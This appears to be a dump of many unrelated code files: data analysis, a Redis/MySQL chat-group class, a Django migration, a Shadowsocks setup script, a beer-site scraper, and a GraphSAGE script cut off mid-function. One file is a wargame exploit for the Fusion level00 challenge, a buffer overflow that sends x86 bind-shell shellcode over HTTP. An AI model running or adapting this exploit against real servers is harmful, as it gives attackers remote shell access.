text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
# Credit-card statement analysis.
"""
Ultimate goal: analyse statements fetched from the web.
Stage one: analyse a statement stored in a local CSV file.
"""
import pandas as pd
import matplotlib.pyplot as plt

# BUG FIX: the path must be a raw string -- in Python 3, '\U' inside a normal
# string literal starts a \UXXXXXXXX unicode escape and is a SyntaxError.
cardFee = pd.read_csv(r'C:\Users\cyn\Desktop\cradicard.csv', header=None, encoding="gb2312")
# Column 2 holds amounts such as 'RMB123.45'; strip the currency tag -> float.
cardFee[2] = cardFee[2].map(lambda v: float(v.replace('RMB', '')))
# Label the rows with the description column so the bar chart is readable.
cardFee.index = cardFee[1]
cardFee.plot(kind='barh')
plt.show()  # matplotlib was imported but the chart was never displayed
print("Введите имя")
spravochnik_telefonov = {}


def _valid_phone(a):
    """Return True for phone strings shaped like +7-XXX-XXX-XX-XX.

    BUG FIX: the original indexed a[6]/a[10]/a[13] before checking the
    length, so a short input crashed with IndexError; the length check
    now runs first.
    """
    return (len(a) == 16
            and a[0] == "+" and a[1] == "7"
            and a[2] == "-" and a[6] == "-" and a[10] == "-" and a[13] == "-"
            and a[1:].replace("-", "").isdigit())


def spravochnik(spravochnik_telefonov):
    """Interactively fill the phone book until the user enters 'q'.

    Reads a name; 'q' prints the directory and stops, any other name
    prompts for a phone number which is stored only when well-formed.
    """
    while True:
        name = input()
        if name == 'q':
            print("Ваш справочник")
            print(spravochnik_telefonov)
            break
        print("Введите номер телефона в формате +7-***-***-**-**")
        a = input()
        if _valid_phone(a):
            spravochnik_telefonov[name] = a
        else:
            print("Неправильный формат телефона, попробуйте снова")
        print("Введите имя")


spravochnik(spravochnik_telefonov)
# -*- coding: utf-8 -*-
import logging
import redis
import time
class Group(object):
    """Chat-group persistence and change-event publishing.

    ``db`` is a MySQL-style handle exposing begin/execute/commit;
    ``rds`` is a redis-py client. All methods are static -- the class
    is used purely as a namespace.
    """
    # Event type names carried in the "name" field of published messages.
    GROUP_EVENT_CREATE = "group_create"
    GROUP_EVENT_DISBAND = "group_disband"
    GROUP_EVENT_UPGRADE = "group_upgrade"
    GROUP_EVENT_MEMBER_ADD = "group_member_add"
    GROUP_EVENT_MEMBER_REMOVE = "group_member_remove"
    GROUP_EVENT_MEMBER_MUTE = "group_member_mute"

    # Group id supplied by the caller (translated from: 外部指定groupid).
    @staticmethod
    def create_group_ext(db, group_id, appid, master, name, is_super, members):
        """Create a group with an externally chosen id.

        Inserts the group row plus one group_member row per member in a
        single transaction; returns the given group_id.
        """
        now = int(time.time())
        db.begin()
        sql = "INSERT INTO `group`(id, appid, master, name, super) VALUES(%s, %s, %s, %s, %s)"
        s = 1 if is_super else 0  # stored as a 0/1 flag
        r = db.execute(sql, (group_id, appid, master, name, s))
        for m in members:
            sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
            db.execute(sql, (group_id, m, now))
        db.commit()
        return group_id

    # Group id assigned by the database (translated from: 使用自增的groupid).
    @staticmethod
    def create_group(db, appid, master, name, is_super, members):
        """Create a group using the table's auto-increment id.

        Same as create_group_ext, except the id comes from ``lastrowid``.
        """
        now = int(time.time())
        db.begin()
        sql = "INSERT INTO `group`(appid, master, name, super) VALUES(%s, %s, %s, %s)"
        s = 1 if is_super else 0
        r = db.execute(sql, (appid, master, name, s))
        group_id = r.lastrowid  # id generated by the insert
        for m in members:
            sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
            db.execute(sql, (group_id, m, now))
        db.commit()
        return group_id

    @staticmethod
    def update_group_name(db, group_id, name):
        """Rename the group."""
        sql = "UPDATE `group` SET name=%s WHERE id=%s"
        r = db.execute(sql, (name, group_id))
        logging.debug("update group name rows:%s", r.rowcount)

    @staticmethod
    def update_group_notice(db, group_id, notice):
        """Replace the group's notice/announcement text."""
        sql = "UPDATE `group` SET notice=%s WHERE id=%s"
        r = db.execute(sql, (notice, group_id))
        logging.debug("update group notice rows:%s", r.rowcount)

    @staticmethod
    def update_group_super(db, group_id, is_super):
        """Set or clear the group's "super" flag (stored as 0/1)."""
        sql = "UPDATE `group` SET super=%s WHERE id=%s"
        s = 1 if is_super else 0
        r = db.execute(sql, (s, group_id))
        logging.debug("update group super:%s", r.rowcount)

    @staticmethod
    def disband_group(db, group_id):
        """Delete the group row and all of its membership rows in one transaction."""
        db.begin()
        sql = "DELETE FROM `group` WHERE id=%s"
        r = db.execute(sql, group_id)
        logging.debug("rows:%s", r.rowcount)
        sql = "DELETE FROM group_member WHERE group_id=%s"
        r = db.execute(sql, group_id)
        logging.debug("delete group rows:%s", r.rowcount)
        db.commit()

    @staticmethod
    def add_group_member(db, group_id, member_id):
        """Add one member; timestamp records the join time (unix seconds)."""
        now = int(time.time())
        sql = "INSERT INTO group_member(group_id, uid, timestamp) VALUES(%s, %s, %s)"
        r = db.execute(sql, (group_id, member_id, now))
        logging.debug("insert rows:%s", r.rowcount)

    @staticmethod
    def delete_group_member(db, group_id, member_id):
        """Remove one member from the group."""
        sql = "DELETE FROM group_member WHERE group_id=%s AND uid=%s"
        r = db.execute(sql, (group_id, member_id))
        logging.debug("delete group member rows:%s", r.rowcount)

    @staticmethod
    def get_group_members(db, group_id):
        """Return a list of (uid, nickname) rows for every member."""
        sql = "SELECT uid, nickname FROM group_member WHERE group_id=%s"
        r = db.execute(sql, group_id)
        return list(r.fetchall())

    @staticmethod
    def update_nickname(db, group_id, member_id, nickname):
        """Set a member's in-group nickname."""
        sql = "UPDATE `group_member` SET nickname=%s WHERE group_id=%s AND uid=%s"
        r = db.execute(sql, (nickname, group_id, member_id))
        logging.debug("update nickname rows:%s", r.rowcount)

    @staticmethod
    def update_mute(db, group_id, member_id, mute):
        """Mute (truthy -> 1) or unmute (0) a member."""
        m = 1 if mute else 0
        sql = "UPDATE `group_member` SET mute=%s WHERE group_id=%s AND uid=%s"
        r = db.execute(sql, (m, group_id, member_id))
        logging.debug("update mute rows:%s", r.rowcount)

    @staticmethod
    def get_group_master(db, group_id):
        """Return the uid of the group owner.

        NOTE(review): fetchone() returns None for a missing group, which
        makes the subscription below raise -- presumably callers guarantee
        the group exists; confirm before relying on this.
        """
        sql = "SELECT master FROM `group` WHERE id=%s"
        cursor = db.execute(sql, group_id)
        r = cursor.fetchone()
        master = r["master"]
        return master

    @staticmethod
    def get_group(db, group_id):
        """Return the group row (mapping) or None when not found; notice defaults to ''."""
        sql = "SELECT id, appid, master, super, name, COALESCE(notice, '') as notice FROM `group` WHERE id=%s"
        cursor = db.execute(sql, group_id)
        r = cursor.fetchone()
        return r

    # All groups a user belongs to (translated from: 获取用户所在的所有群).
    @staticmethod
    def get_groups(db, appid, uid):
        """Return every group row (within appid) that uid is a member of."""
        sql = "SELECT g.id, g.appid, g.master, g.super, g.name, COALESCE(g.notice, '') as notice FROM `group_member`, `group` as g WHERE group_member.uid=%s AND group_member.group_id=g.id AND g.appid=%s"
        cursor = db.execute(sql, (uid, appid))
        return list(cursor.fetchall())

    @staticmethod
    def publish_create_event(rds, appid, gid, is_super):
        """Publish a group-created event."""
        s = 1 if is_super else 0
        content = {
            "group_id": gid,
            "app_id": appid,
            "super": s,
            "name": Group.GROUP_EVENT_CREATE
        }
        Group.publish_message(rds, content)

    @staticmethod
    def publish_upgrade_event(rds, appid, gid):
        """Publish a group-upgraded-to-super event (super is always 1 here)."""
        content = {
            "group_id": gid,
            "app_id": appid,
            "super": 1,
            "name": Group.GROUP_EVENT_UPGRADE
        }
        Group.publish_message(rds, content)

    @staticmethod
    def publish_disband_event(rds, gid):
        """Publish a group-disbanded event."""
        content = {"group_id": gid, "name": Group.GROUP_EVENT_DISBAND}
        Group.publish_message(rds, content)

    @staticmethod
    def publish_member_mute_event(rds, gid, member_id, is_mute):
        """Publish a member-mute-changed event (mute serialized as 0/1)."""
        mute = 1 if is_mute else 0
        content = {
            "group_id":gid,
            "member_id":member_id,
            "mute":mute,
            "name":Group.GROUP_EVENT_MEMBER_MUTE
        }
        Group.publish_message(rds, content)

    @staticmethod
    def publish_member_add_event(rds, gid, member_id):
        """Publish a member-added event."""
        content = {
            "group_id": gid,
            "member_id": member_id,
            "name": Group.GROUP_EVENT_MEMBER_ADD
        }
        Group.publish_message(rds, content)

    @staticmethod
    def publish_member_remove_event(rds, gid, member_id):
        """Publish a member-removed event."""
        content = {
            "group_id": gid,
            "member_id": member_id,
            "name": Group.GROUP_EVENT_MEMBER_REMOVE
        }
        Group.publish_message(rds, content)

    # groups_actions_id : monotonically increasing action sequence number.
    # groups_actions    : previous and current action ids, stored as "prev_id:id".
    @staticmethod
    def publish_message(rds, msg):
        """Append ``msg`` to the group_manager_stream Redis stream.

        Uses WATCH / MULTI optimistic locking so the action-id counter and
        the "prev:cur" pair stay consistent under concurrent publishers;
        retries (forever) when another client touches the watched keys.
        """
        with rds.pipeline() as pipe:
            while True:
                try:
                    pipe.watch("groups_actions_id")
                    pipe.watch("groups_actions")
                    action_id = pipe.get("groups_actions_id")
                    action_id = int(action_id) if action_id else 0
                    action_id = action_id + 1
                    group_actions = pipe.get("groups_actions")
                    prev_id = 0
                    if group_actions:
                        # the stored *current* id becomes our previous id
                        _, prev_id = group_actions.split(":")
                    pipe.multi()
                    pipe.set("groups_actions_id", action_id)
                    group_actions = "%s:%s"%(prev_id, action_id)
                    pipe.set("groups_actions", group_actions)
                    m = msg.copy()
                    m["previous_action_id"] = prev_id
                    m["action_id"] = action_id
                    # stream is capped at the most recent 100k events
                    pipe.xadd("group_manager_stream", m, maxlen=100000)
                    pipe.execute()
                    logging.info("xadd group event:%s to stream", m)
                    break
                except redis.WatchError as e:
                    logging.info("watch err:%s", e)
|
# Generated by Django 2.0.3 on 2018-11-05 07:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the orders app.

    Creates the menu-item tables (Pasta, Pizza, PizzaTopping, PizzaType,
    Platter, Salad, Size, Sub, SubExtra); the FK / M2M links are added
    afterwards so every referenced table already exists.
    Auto-generated by Django -- do not hand-edit the operations.
    """
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Pasta',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pasta', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='Pizza',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pizza', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='PizzaTopping',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('topping', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='PizzaType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pizzaType', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='Platter',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('platter', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='Salad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('salad', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='Size',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=7)),
                ('size', models.CharField(max_length=63)),
            ],
        ),
        migrations.CreateModel(
            name='Sub',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sub', models.CharField(max_length=63)),
                ('size', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sub_size', to='orders.Size')),
            ],
        ),
        migrations.CreateModel(
            name='SubExtra',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subExtra', models.CharField(max_length=63)),
            ],
        ),
        # Relations added after both endpoint tables exist.
        migrations.AddField(
            model_name='sub',
            name='subExtra',
            field=models.ManyToManyField(blank=True, related_name='sub_extra', to='orders.SubExtra'),
        ),
        migrations.AddField(
            model_name='platter',
            name='size',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='platter_size', to='orders.Size'),
        ),
        migrations.AddField(
            model_name='pizza',
            name='pizzaToppings',
            field=models.ManyToManyField(blank=True, related_name='pizza_toppings', to='orders.PizzaTopping'),
        ),
        migrations.AddField(
            model_name='pizza',
            name='pizzaType',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pizza_type', to='orders.PizzaType'),
        ),
        migrations.AddField(
            model_name='pizza',
            name='size',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pizza_size', to='orders.Size'),
        ),
    ]
|
#!/usr/bin/env python3
#
# Internal Reporting Tool.
#
# This tool queries the "news" postgre database to answer the following:
# 1. What are the most popular three articles of all time?
# 2. Who are the most popular article authors of all time?
# 3. On which days did more than 1% of requests lead to errors?
import psycopg2
import bleach
# Each entry: (index into this list, db view name, per-row format string,
# and the question the view answers). Only these hard-coded view names are
# ever interpolated into SQL (see get_report).
views = [
    (0, 'popular_articles',
     '''\n"{0}" - {1} views''',
     '\n\nWhat are the most popular three articles of all time?'),
    (1, 'popular_authors',
     '''\n{0} - {1} views''',
     '\n\nWho are the most popular article authors of all time?'),
    (2, 'error_one_percent',
     '''\n{0} - {1:.1f}% errors''',
     '\n\nOn which days did more than 1% of requests lead to errors?')
]
def get_report(view):
    """Return all rows of the pre-built view selected by integer index.

    `view` indexes the module-level `views` table; only its hard-coded
    view *name* is interpolated into the SQL, so no user input reaches
    the query string (view names cannot be bound parameters).
    """
    news = psycopg2.connect("dbname=news")
    try:
        cursor = news.cursor()
        # cant do this for sql injects: cursor.execute('select * from %s', (view,))
        # use integer inputs to this function only
        cursor.execute('select * from %s' % views[view][1])
        rows = cursor.fetchall()
    finally:
        # BUG FIX: the connection leaked when execute/fetch raised;
        # always release it.
        news.close()
    return rows
if __name__ == '__main__':
    # Render every report: the question first, then one formatted line per row.
    for idx, _view_name, row_fmt, question in views:
        rows = get_report(idx)
        print(question)
        print("".join(row_fmt.format(value, count) for value, count in rows))
    # trailing whitespace so the final report is visually separated
    print("\n\n")
|
#! /usr/bin/python
#-*- coding:utf-8 -*-
#Shadowsocks Win32 Server Setup Script (Python)
#By Vincent Lau @ tfp.io
#Email: me@tffans.cn
import os
import sys
import time
#Function of Check and Create the Config File for the Server
def ConfigFile():
if os.path.exists(inipath):
ConfigIsExist = True
else:
ConfigIsExist = False
if ConfigIsExist:
pass
else:
print "This is the first time for you to use this server, now let's go to configure it."
ServerIP = raw_input("Please enter the IP of you Server. \nUse :: if you want to accept all the connections including IPV6. \nDefault: 127.0.0.1\n")
if ServerIP == "":
ServerIP = "127.0.0.1"
ServerPort = raw_input("Please enter the Port of you Server. \nDefault: 8388\n")
if ServerPort == "":
ServerPort = "8388"
ServerPass = raw_input("Please enter the Passcode of you Server. \nDefault: tfp.io\n")
if ServerPass == "":
ServerPass = "tfp.io"
ServerMethod = raw_input("Please enter the Method of you Server. \nIf you do not know what it is, just remember the default method. \nDefault: aes-256-cfb\n")
if ServerMethod == "":
ServerMethod = "aes-256-cfb"
ConfigContent = open(jsonpath,"w")
ConfigContent.write("{")
ConfigContent.close
ConfigContent = open(jsonpath,"a")
ConfigContent.write("\n \"server\":\"%s\"," % ServerIP)
ConfigContent.write("\n \"server_port\":\"%s\"," % ServerPort)
ConfigContent.write("\n \"local_address\":\"127.0.0.1\",")
ConfigContent.write("\n \"local_port\":\"1080\",")
ConfigContent.write("\n \"password\":\"%s\"," % ServerPass)
ConfigContent.write("\n \"timeout\":600,")
ConfigContent.write("\n \"method\":\"%s\"" % ServerMethod)
ConfigContent.write("\n}")
ConfigContent.close
print "Config Json File Created Successfully! \nFor other options, you can modify the config file by yourself!"
ConfigContent = open(inipath,"w")
ConfigContent.write("No Delete this File!")
ConfigContent.close
if os.path.exists(appdata_path + r"\tmp.vbs"):
msg = raw_input("Please re-run the script to make it work! Press Enter to exit this script...")
sys.exit()
#Download Node.js v0.10.36 from the official site
def DownNode():
import urllib2
print "I\'m going to download, and when finished, you will receive another message!"
url = r'http://npm.taobao.org/mirrors/node/v0.10.36/node-v0.10.36-x86.msi'
f = urllib2.urlopen(url)
data = f.read()
with open(appdata_path + r"\node-v0.10.36-x86.msi", "wb") as code:
code.write(data)
print "Operation Finished! Start to install!"
#Set basic path for this script
appdata_path = os.getenv("APPDATA")  # roaming AppData dir of the current user
# Marker file: its existence means configuration has already been done.
inipath = appdata_path + r"\npm\node_modules\shadowsocks\sserver.ini"
# Shadowsocks server JSON configuration written by ConfigFile().
jsonpath = appdata_path + r"\npm\node_modules\shadowsocks\config.json"
#Check whether a process is running
def check_exist(process_name):
    """Return True when a Windows process with the given image name exists.

    Exits the script with a warning when pywin32 is not installed.
    """
    try:
        import win32com.client
    except:
        msg = raw_input("WARNING: I CANNOT FIND PYWIN32 LIBS IN YOU PYTHON! YOU MUST INSTALL IT! \nPress Enter to Exit...")
        sys.exit()
    wmi = win32com.client.GetObject('winmgmts:')
    matches = wmi.ExecQuery('select * from Win32_Process where Name="%s"' % process_name)
    return len(matches) > 0
#Run the SSServer
def RunServer():
ConfigFile()
VBScript()
print "Shodowsocks Server Started Successfully! \nNote: YOU CAN MODIFY THE CONFIG AS YOU LIKE. \nPath: " + appdata_path + r"\npm\node_modules\shadowsocks\config.json"
print "The script will exit in 5 seconds..."
time.sleep(5)
sys.exit()
def VBScript():
    """Run the helper VBS that launches ssserver hidden; create it when absent.

    BUG FIXED: the original used ``TmpVBS.close`` (attribute access, not a
    call), leaving the file possibly unflushed when the script asked the
    user to re-run; a ``with`` block now closes it deterministically.
    """
    if os.path.exists(appdata_path + r"\tmp.vbs"):
        os.system(appdata_path + r"\tmp.vbs")
    else:
        with open(appdata_path + r"\tmp.vbs", "w") as TmpVBS:
            TmpVBS.write("set SSServer = WScript.CreateObject(\"WScript.Shell\") \n")
            # window style 0 -> start ssserver with no visible console
            TmpVBS.write("SSServer.Run \"%AppData%\\npm\\ssserver\",0 ")
        msg = raw_input("Please re-run the script to make the startup script work! Press Enter to exit this script...")
        sys.exit()
#Check whether Node is running -- an existing instance would conflict with ours
if check_exist('node.exe'):
    print "Warning: I have detected that one or more Node instances are running, plaese close them before you can start a server. Wanna Close them? (y/n)\n"
    msg = raw_input()
    if msg == "y":
        os.system(r"taskkill /f /im node.exe")
        print "Success! I\'ll just go on to the next process..."
    else:
        sys.exit()
#Check if Node.js is Installed (the %APPDATA%\npm dir is used as the marker)
if os.path.exists(appdata_path + r"\npm"):
    NodeIsExist = True
else:
    NodeIsExist = False
#Check if SSServer is Installed
if os.path.exists(appdata_path + r"\npm\node_modules\shadowsocks"):
    SSIsExist = True
else:
    SSIsExist = False
#Main Part: run the server, or install the missing pieces first
#(shadowsocks via npm, or Node.js itself from the mirror).
if SSIsExist:
    RunServer()
elif NodeIsExist:
    print "Sorry, but I cannot find Shadowsocks(node.js) in your computer, please try to install one. \nNote: ONLY NODE.JS VERSION IS ACCEPTABLE! \nWanna install it? (y/n)\n"
    msg = raw_input()
    if msg == "y":
        print "Prepare to install, please wait..."
        os.system(r"npm config set registry http://registry.cnpmjs.org & npm install -g shadowsocks")
        print "Success! I\'ll just go on to the next process..."
        RunServer()
    else:
        sys.exit()
else:
    print "Sorry, but I cannot find Node.js in your computer, please try to install one. \nNote: PLEASE USE V0.10.X, THE LATEST VERSION IS NOT RECOMMENDED! \nWanna install it? (y/n)\n"
    msg = raw_input()
    if msg == "y":
        print "Prepare to install, please wait..."
        DownNode()
        # /qb = quiet install with a basic progress UI
        os.system(r"%appdata%\node-v0.10.36-x86.msi /qb")
        os.makedirs(appdata_path + r"\npm")
        msg = raw_input("Success! Please restart the script! Press enter to exit...")
        sys.exit()
|
from django.http import HttpResponse
from .models import *
from django.shortcuts import render
def index(request):
    """Home page: render index.html with every Med record as 'data'."""
    meds = Med.objects.all()
    context = {'data': meds}
    return render(request, 'index.html', context)
def signup(request):
    """Render the static signup page."""
    template = 'signup.html'
    return render(request, template)
def loginPage(request):
    """Render the static login page."""
    template = 'loginPage.html'
    return render(request, template)
def base(request):
    """Render the bare base template (layout preview)."""
    template = 'base.html'
    return render(request, template)
|
# Currency converter from USD to BITCOINS
def convert_Usd_bitcoin(amount):
    """Convert a positive integer USD amount to bitcoins at a fixed rate.

    Prints a human-readable statement and returns the bitcoin value.
    For invalid input (non-int, bool, or <= 0) it prints the zero message
    and returns 0.
    """
    # Precondition: amount must be a positive integer. bool is explicitly
    # rejected even though it subclasses int -- True/False are not amounts.
    if not isinstance(amount, int) or isinstance(amount, bool) or amount <= 0:
        print('0 USD is equal to 0.0 Bitcoins')
        # BUG FIX: the original returned the invalid `amount` itself
        # (e.g. -5), contradicting the printed "0" result; return 0.
        return 0
    rate = 0.00013  # assumed fixed exchange rate (USD per bitcoin fraction)
    bitcoin = amount * rate
    print(str(amount) + ' USD is equal to ' + str(bitcoin) + ' bitcoins')
    return bitcoin
# Demo call: prints the conversion statement for 40 USD.
convert_Usd_bitcoin(40)
|
#B -- read an integer; print half of it when even, the number itself when odd.
value = int(input())
if value % 2 == 0:
    # int(n/2) and n//2 agree for every even integer, including negatives
    print(value // 2)
else:
    print(value)
|
# https://exploit-exercises.com/fusion/level00/
# Exploit for fusion level00: overflow the HTTP path buffer, overwrite the
# saved return address, and land in shellcode appended after the request
# line. Python 2 script (sends a str payload directly over the socket).
import socket
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 20000)
sock.connect(server_address)
# Request layout: GET <139 filler bytes><retaddr> HTTP/1.1<shellcode>
# retaddr = observed stack base plus fixed offsets so execution resumes at
# the shellcode -- offsets are target-specific; adjust per environment.
retaddr = 0xbffff8f8 + 4 + 143 + 9
path = "A"*139 + struct.pack("<I", retaddr)  # little-endian 32-bit address
# Shellcode taken verbatim from https://www.exploit-db.com/exploits/40056/
# (x86 Linux; the \x11\x5c word is presumably the listen port -- verify
# against the exploit-db entry before reuse).
shellcode = "\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68" + \
"\x11\x5c" + \
"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56" + \
"\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f" + \
"\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"
payload = "GET " + path + " HTTP/1.1" + shellcode
sock.send(payload)
sock.close()
|
"""
The biggest difference between a dict and a list:
a dict stores key/value pairs -- every key maps to exactly one value.
"""
# Creating dictionaries (literal, dict() kwargs, incremental assignment)
a1 = {"name": "xiaoming", "sex": "man", "id": 1}
print(a1)
a2 = dict(id=1, name="xiaoming")
print(a2)
a3 = {}
a3["name"] = "xiaoming"
a3["id"] = 1
print(a3)
# Dict comprehension
a4 = {x: x**2 for x in [1, 2, 3]}
print(a4)
# Indexing returns the value for a key; get() returns a default (None by
# default) when the key is missing instead of raising KeyError.
print(a1["name"])
print(a1.get("name"))
print(a1.get(1))
# Iteration: over .keys(), over the dict itself, and over .items()
for i in a1.keys():
    print(i, a1[i])
for i in a1:
    print(i, a1[i])
for keys, values in a1.items():
    print(keys, values)
# Sorting
# 1. Extract the keys into a list, sort it, then print key/value pairs.
D = {'a': 1, 'c': 3, 'b': 2}
D1 = list(D.keys())
print(D1)
D1.sort()
for i in D1:
    print(i, D[i])
# 2. The built-in sorted() works on any iterable and returns a sorted list.
D2 = {'a': 1, 'c': 3, 'b': 2}
print(sorted(D2))
for i in sorted(D2):
    # BUG FIX: the original indexed D here instead of D2; it only worked
    # because the two dicts happen to hold identical data.
    print(i, D2[i])
|
from math import pi, tan
def polysum(n, s):
    """Return the area of a regular n-gon with side length s plus the
    square of its perimeter (classic MITx 6.00.1x exercise shape)."""
    polygon_area = 0.25 * n * s ** 2 / tan(pi / n)
    perimeter_squared = (n * s) ** 2
    return polygon_area + perimeter_squared
# Demo: evaluate polysum for a handful of (sides, length) pairs.
for sides, length in [(56, 86), (22, 36), (66, 66), (22, 28), (1, 98), (19, 72)]:
    print(polysum(sides, length))
|
import scrapy
import datetime
from scrapy.selector import Selector
from beer.items import Brewery
from beer.items import Beer
class MainStSpider(scrapy.Spider):
    """Scrape mainstreetbeer.ca for tasting-room and growler beer lists."""
    name = 'mainst'
    allowed_domains = ['mainstreetbeer.ca']
    start_urls = ['http://mainstreetbeer.ca/']

    def start_requests(self):
        urls = [
            'http://mainstreetbeer.ca/'
        ]
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def _parse_beer(self, beer):
        """Build one Beer item from a portfolio entry selector.

        Extracted from parse(): the tasting-room and growler loops were
        identical copy/paste blocks.
        """
        item = Beer()
        url = beer.xpath('.//div[@class="work-info"]/a/@href').extract()
        item['url'] = url[0]
        name = beer.xpath('.//div[@class="vert-center"]/h3/text()').extract()
        item['name'] = name[0].upper()
        # Site convention: the last word of the title is the beer style.
        item['style'] = name[0].split()[-1].upper()
        item['abv'] = '--'  # ABV is not published on the page
        return item

    def parse(self, response):
        """Yield a single Brewery item with its beer lists attached."""
        brewery = Brewery()
        brewery['last_updated'] = datetime.datetime.utcnow()
        brewery['name'] = 'Main Street Brewing'
        brewery['address'] = '261 East Seventh Avenue, Vancouver, BC'
        brewery['url'] = 'http://mainstreetbeer.ca/'
        brewery['growlers'] = []
        brewery['tasting_room'] = []
        wrapper = Selector(response).xpath("//div[@class='portfolio-wrap ']")[0]
        for beer in wrapper.xpath('./div/child::*'):
            brewery['tasting_room'].append(self._parse_beer(beer))
        # BUG FIX: the original bound growlerWrapper but then iterated
        # ``wrapper`` again (copy/paste slip). Both selectors are currently
        # identical, so scraped output is unchanged -- TODO: confirm whether
        # the growler section actually lives under a different wrapper.
        growler_wrapper = Selector(response).xpath("//div[@class='portfolio-wrap ']")[0]
        for beer in growler_wrapper.xpath('./div/child::*'):
            brewery['growlers'].append(self._parse_beer(beer))
        yield brewery
|
import re
def get_current_method():
    """List base_api attribute names whose suffix is an HTTP verb."""
    from script import base_api
    http_verbs = {"get", "post", "patch", "head", "delete", "put"}
    return [attr for attr in dir(base_api) if attr.split("_")[-1] in http_verbs]
def get_method_name(url: str):
    """Resolve a URL-derived name to a known API method name.

    Numeric path segments are treated as wildcards; when no known method
    matches, the input is returned unchanged.
    """
    if not re.match(r".*\d+", url):
        return url
    pattern = re.sub(r"_\d+", "_.+?", url)
    candidates = [m for m in get_current_method() if re.match(pattern, m)]
    return candidates[0] if candidates else url
def get_method(url, method):
    """Print the import line for the API helper matching url + HTTP method.

    '/api-operation-app/employee/login' + 'POST' ->
    'from script.base_api.api_operation_app.employee import employee_login_post'.
    """
    server_name, method_name = url[1:].replace("-", "_").split("/", 1)
    file_name = method_name.split("/")[0]
    # (removed the no-op ``server_name = server_name`` self-assignment)
    method_name = get_method_name(method_name.replace("/", "_") + "_" + method.lower())
    print(f"from script.base_api.{server_name}.{file_name} import {method_name}")
if __name__ == '__main__':
    # Demo: resolve the import line for the employee login endpoint.
    get_method("/api-operation-app/employee/login", "POST")
|
from PACK import *
from torch.optim.lr_scheduler import StepLR
from encoder import Encoder
from model import SupervisedGraphSAGE
from utils import buildTestData
from collect_graph import removeIsolated, collectGraph_train, collectGraph_train_v2, collectGraph_test
import numpy as np
import math
import time
import random
import visdom
from tqdm import tqdm
import argparse
import ast
# External evaluation binary and retrieval output location (placeholders
# to be replaced with real paths).
eval_func = '/path/to/compute_ap'
retrieval_result = '/path/to/retrieval'
# Graph sizes and data locations for the two retrieval test sets.
test_dataset = {
    'oxf': {
        'node_num': 5063,
        'img_testpath': '/path/to/images',
        'feature_path': '/path/to/feature',
        'gt_path': '/path/to/oxford5k_groundTruth',
    },
    'par': {
        'node_num': 6392,
        'img_testpath': '/path/to/images',
        'feature_path': '/path/to/feature',
        'gt_path': '/path/to/paris6k_groundTruth',
    }
}
# Ground-truth evaluators, built once per dataset and reused by test().
building_oxf = buildTestData(img_path=test_dataset['oxf']['img_testpath'], gt_path=test_dataset['oxf']['gt_path'], eval_func=eval_func)
building_par = buildTestData(img_path=test_dataset['par']['img_testpath'], gt_path=test_dataset['par']['gt_path'], eval_func=eval_func)
building = {
    'oxf': building_oxf,
    'par': building_par,
}
def makeModel(node_num, class_num, feature_map, adj_lists, args):
    """Assemble a two-layer supervised GraphSAGE model over frozen node features."""
    ## frozen feature table: one row per node, never updated by the optimizer
    embedding = nn.Embedding(node_num, args.feat_dim)
    frozen_weights = nn.Parameter(torch.from_numpy(feature_map).float(), requires_grad=False)
    embedding.weight = frozen_weights
    ## first aggregation layer reads the raw features
    encoder_1 = Encoder(embedding, args.feat_dim, args.embed_dim_1, adj_lists,
                        num_sample=args.num_sample, gcn=args.use_gcn, use_cuda=args.use_cuda)
    ## second layer consumes encoder_1's (transposed) output; original note:
    ## a lambda "doesn't support gradient backward" -- kept as-is.
    encoder_2 = Encoder(lambda nodes: encoder_1(nodes).t(), args.embed_dim_1, args.embed_dim_2,
                        adj_lists, num_sample=args.num_sample, gcn=args.use_gcn, use_cuda=args.use_cuda)
    ## classification head on top of the two encoders
